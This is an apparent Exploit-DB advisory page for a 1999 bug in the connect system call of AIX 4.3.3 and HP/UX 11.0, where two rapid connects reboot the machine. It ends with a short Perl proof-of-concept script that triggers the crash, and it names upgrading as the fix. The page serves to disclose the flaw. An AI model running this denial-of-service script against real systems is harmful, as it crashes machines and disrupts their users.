AIX and HP/UX connect system call vulnerability

vendor:

AIX

by:

SecurityFocus

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: AIX

Affected Version From: AIX 4.3.3 and HP/UX 11.0

Affected Version To: AIX 4.3.3 and HP/UX 11.0

Patch Exists: YES

Related CWE: N/A

CPE: o:ibm:aix:4.3.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: AIX and HP/UX

1999

AIX and HP/UX connect system call vulnerability

Certain versions of AIX and HP/UX contained a bug in the way the OS handled the connect system call. The connect call is used to initiate a connection on a socket. Because of the flaw in the handling code under AIX certain versions will reboot when given two connects, one to a fixed port (a number of different ports were found to trigger this behaviour) and then another random port connection immediately thereafter.

Mitigation:

Upgrade to the latest version of AIX and HP/UX

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/352/info


Certain versions of AIX and HP/UX contained a bug in the way the OS handled the connect system call. The connect call is used to initiate a connection on a socket. Because of the flaw in the handling code under AIX certain versions will reboot when given two connects, one to a fixed port (a number of different ports were found to trigger this behaviour) and then another random port connection immediately thereafter. 

#!/usr/local/bin/perl5
use Socket;

socket (SOCK,AF_INET,SOCK_STREAM,0);
$iaddr = inet_aton('localhost');
$paddr = sockaddr_in('23',$iaddr);
connect SOCK,$paddr;
shutdown SOCK,2;
$paddr = sockaddr_in('24',$iaddr);
connect SOCK,$paddr;